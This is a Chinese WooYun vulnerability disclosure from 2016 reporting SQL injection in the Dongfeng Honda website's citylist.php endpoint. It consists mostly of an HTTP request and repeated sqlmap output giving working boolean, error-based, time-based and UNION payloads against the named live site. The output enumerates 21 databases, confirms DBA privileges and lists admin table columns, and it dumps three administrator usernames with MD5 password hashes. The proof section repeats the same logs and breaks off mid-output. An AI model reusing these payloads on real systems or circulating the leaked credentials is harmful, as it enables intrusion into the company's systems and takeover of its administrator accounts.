当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0175563

漏洞标题:东风本田主站sql注入

相关厂商:dongfeng-honda.com

漏洞作者: 路人甲

提交时间:2016-02-14 08:38

修复时间:2016-02-22 09:00

公开时间:2016-02-22 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-14: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
娱乐而已 刷个存在感 你会走大厂商么.

详细说明:

GET注入 

GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203*2*1%3d6%20AND%20106%3d106 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.dongfeng-honda.com/
Cookie: PHPSESSID=sg3e5k6l8mkrqlbp1qh4ttmq90; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2281077d9616d91bf9aa7dde5c79fd7fc6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22112.236.32.109%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1455261982%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Ddc6321ccfbb2819f54ee8db010d9b7de; WT_FPC=id=29e92c2ab4dd03fd2531455261571288:lv=1455261778668:ss=1455261571288; __utmt=1; __utma=118242844.204872392.1455261566.1455261576.1455261576.1; __utmb=118242844.6.9.1455261986478; __utmc=118242844; __utmz=118242844.1455261576.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_4698ba1a14a0b270590a11db5898b67c=1455261586,1455261603,1455261768,1455261779; Hm_lpvt_4698ba1a14a0b270590a11db5898b67c=1455261779; _ga=GA1.2.204872392.1455261566; _gat=1; pt_26906001=uid=yYK0sHrtDZo8U928JgSbwg&nid=0&vid=WliG/TLgpT9STIp0VXDMwg&vn=2&pvn=1&sact=1455261594156&to_flag=0&pl=OL3022hYLcJhu/oXOit66g*pt*1455261594156; pt_s_26906001=vt=1455261594156&cad=; Hm_lvt_e6c5317da3c5de39054ad99b8f4736ee=1455260921,1455260992,1455261566; Hm_lpvt_e6c5317da3c5de39054ad99b8f4736ee=1455261566; CNZZDATA3080075=cnzz_eid%3D202617920-1455256801-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1455256801; visited=1; HMACCOUNT=5755128E85F5C5B7; test_cookie=CheckForPermission; id=22c90e64c30400b9||t=1455261579|et=730|cs=002213fd48ebb994302e124084; pt_t_26906001=?id=26906001.yYK0sHrtDZo8U928JgSbwg.WliG/TLgpT9STIp0VXDMwg.OL3022hYLcJhu/oXOit66g.Hhv2XaeyETu40OV7MmZwQA&stat=0.0.0.0.0body.0.0.810.30000.0.0&ptif=2; bdshare_firstime=1455261656497; BAIDUID=2B1217E89F0195C2819D75A6DD86BE33:FG=1; __utmv=
Host: www.dongfeng-honda.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


sqlmap identified the following injection point(s) with a total of 859 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
available databases [21]:
[*] cdcol
[*] crossdriving
[*] crossdriving3rd
[*] crv_2011
[*] dongben_wdhac
[*] dongbzt
[*] dongfeng_activity
[*] dongfeng_club
[*] greiz_luck
[*] honda
[*] honda_10year
[*] honda_2hc
[*] honda_campaign
[*] honda_stayahead
[*] hondaxy
[*] information_schema
[*] jade
[*] jiede_activity
[*] mysql
[*] phpmyadmin
[*] spirior_xrv
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
current database:    'honda_2hc'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
[54 tables]
+----------------------------+
| cd_2ws_order               |
| cd_2ws_ownerstory          |
| cd_admin                   |
| cd_admin_login             |
| cd_advanced                |
| cd_advanced_popedom        |
| cd_adver                   |
| cd_adver_page              |
| cd_attachment              |
| cd_ci_sessions             |
| cd_dream_dreams            |
| cd_dream_log               |
| cd_dream_log_zd            |
| cd_dream_randnum           |
| cd_dream_user              |
| cd_filestamp               |
| cd_group                   |
| cd_group_popedom           |
| cd_hd_userinfo             |
| cd_inquire                 |
| cd_link                    |
| cd_link_class              |
| cd_message                 |
| cd_message_state           |
| cd_news_class              |
| cd_news_info               |
| cd_reply                   |
| cd_rv_actinfo              |
| cd_rv_area                 |
| cd_rv_area_copy            |
| cd_rv_aream                |
| cd_rv_dealer               |
| cd_rv_dealer_insight       |
| cd_rv_userinfo             |
| cd_rv_userinfo_api         |
| cd_rv_userinfo_api_toexcel |
| cd_rv_userinfo_buy         |
| cd_rv_userinfo_elysion     |
| cd_rv_userinfo_m           |
| cd_rv_userinfo_mobile      |
| cd_rv_userinfo_pcenter     |
| cd_sp_log                  |
| cd_sp_user                 |
| cd_spirior_order           |
| cd_system_info             |
| cd_tags                    |
| cd_userinfo_api_ad         |
| cd_v_admin                 |
| cd_v_inbox                 |
| cd_v_news_class            |
| cd_v_rv_userinfo_api       |
| cd_v_rv_userinfo_m         |
| cdb_article                |
| cdb_article_copy           |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
Table: cd_admin
[21 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| answer        | varchar(50) |
| birthday      | varchar(10) |
| cardid        | varchar(18) |
| createTime    | int(11)     |
| email         | varchar(50) |
| group_id      | smallint(6) |
| id            | int(11)     |
| lastLoginIp   | int(11)     |
| lastLoginTime | int(11)     |
| loginCount    | int(11)     |
| mobile        | varchar(30) |
| modifyTime    | int(11)     |
| msn           | varchar(50) |
| name          | varchar(30) |
| pass          | varchar(32) |
| phone         | varchar(30) |
| posts         | varchar(50) |
| qq            | varchar(20) |
| question      | varchar(50) |
| realname      | varchar(50) |
| state         | tinyint(4)  |
+---------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
Table: cd_admin
[3 entries]
+---------+----------------------------------+
| name    | pass                             |
+---------+----------------------------------+
| admin   | cc03577bda0309a89498a1c7a58f3f62 |
| yangnan | 8e005e4bbecd53c1fa6f244d5b4af170 |
| jiahuan | 1eb2eb89d66acd6799084e07cda6a0f6 |
+---------+----------------------------------+


上个装逼图:

YQPK0E8IV5`F2E@IAG0BB_3.png


漏洞证明:


GET注入 

GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203*2*1%3d6%20AND%20106%3d106 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.dongfeng-honda.com/
Cookie: PHPSESSID=sg3e5k6l8mkrqlbp1qh4ttmq90; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2281077d9616d91bf9aa7dde5c79fd7fc6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22112.236.32.109%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1455261982%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Ddc6321ccfbb2819f54ee8db010d9b7de; WT_FPC=id=29e92c2ab4dd03fd2531455261571288:lv=1455261778668:ss=1455261571288; __utmt=1; __utma=118242844.204872392.1455261566.1455261576.1455261576.1; __utmb=118242844.6.9.1455261986478; __utmc=118242844; __utmz=118242844.1455261576.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_4698ba1a14a0b270590a11db5898b67c=1455261586,1455261603,1455261768,1455261779; Hm_lpvt_4698ba1a14a0b270590a11db5898b67c=1455261779; _ga=GA1.2.204872392.1455261566; _gat=1; pt_26906001=uid=yYK0sHrtDZo8U928JgSbwg&nid=0&vid=WliG/TLgpT9STIp0VXDMwg&vn=2&pvn=1&sact=1455261594156&to_flag=0&pl=OL3022hYLcJhu/oXOit66g*pt*1455261594156; pt_s_26906001=vt=1455261594156&cad=; Hm_lvt_e6c5317da3c5de39054ad99b8f4736ee=1455260921,1455260992,1455261566; Hm_lpvt_e6c5317da3c5de39054ad99b8f4736ee=1455261566; CNZZDATA3080075=cnzz_eid%3D202617920-1455256801-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1455256801; visited=1; HMACCOUNT=5755128E85F5C5B7; test_cookie=CheckForPermission; id=22c90e64c30400b9||t=1455261579|et=730|cs=002213fd48ebb994302e124084; pt_t_26906001=?id=26906001.yYK0sHrtDZo8U928JgSbwg.WliG/TLgpT9STIp0VXDMwg.OL3022hYLcJhu/oXOit66g.Hhv2XaeyETu40OV7MmZwQA&stat=0.0.0.0.0body.0.0.810.30000.0.0&ptif=2; bdshare_firstime=1455261656497; BAIDUID=2B1217E89F0195C2819D75A6DD86BE33:FG=1; __utmv=
Host: www.dongfeng-honda.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


sqlmap identified the following injection point(s) with a total of 859 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
available databases [21]:
[*] cdcol
[*] crossdriving
[*] crossdriving3rd
[*] crv_2011
[*] dongben_wdhac
[*] dongbzt
[*] dongfeng_activity
[*] dongfeng_club
[*] greiz_luck
[*] honda
[*] honda_10year
[*] honda_2hc
[*] honda_campaign
[*] honda_stayahead
[*] hondaxy
[*] information_schema
[*] jade
[*] jiede_activity
[*] mysql
[*] phpmyadmin
[*] spirior_xrv
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
current database:    'honda_2hc'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
